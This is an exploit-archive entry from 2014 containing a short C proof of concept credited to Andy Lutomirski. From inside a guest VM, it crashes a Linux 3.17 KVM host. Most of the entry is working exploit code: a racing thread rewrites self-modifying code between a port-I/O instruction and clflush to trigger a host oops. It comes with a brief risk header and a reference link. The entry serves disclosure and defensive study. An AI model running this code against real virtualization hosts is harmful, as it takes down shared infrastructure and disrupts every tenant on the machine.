Linux 3.17 guest-triggerable KVM OOPS PoC

2014.10.24
Risk: Medium
Local: No
Remote: Yes
CWE: N/A

// KVM clflush sploit (crashes a Linux 3.17 host)
// Copyright (c) 2014 Andy Lutomirski

#include <pthread.h>
#include <err.h>
#include <stdio.h>
#include <stdint.h>
#include <signal.h>
#include <setjmp.h>
#include <string.h>
#include <stdbool.h>
#include <sys/io.h>

// badcode sits in a writable, executable section so it can be patched while it runs.
asm (".pushsection .wtext, \"awx\"\n"
     "badcode:\n\t"
     "clflush (%rip)\n\t"
     "ret\n"
     ".popsection");

extern volatile unsigned short badcode[];

// Racing thread: keeps setting the first two bytes to 0f ae (clflush opcode).
static void *proc(void *ignored)
{
    while (true)
        badcode[0] = 0xae0f;

    return NULL;
}

int main()
{
    // Port I/O from user mode requires I/O privilege level 3.
    if (iopl(3) != 0)
        err(1, "iopl");

    pthread_t pth;
    pthread_create(&pth, NULL, proc, NULL);

    while (true) {
        // Set the first two bytes to e4 00 (in $0x0, %al), then call it.
        badcode[0] = 0x00e4;
        asm volatile ("call badcode" : : : "ax", "flags");
    }
}

References:

http://cxsecurity.com/issue/WLB-2014100149

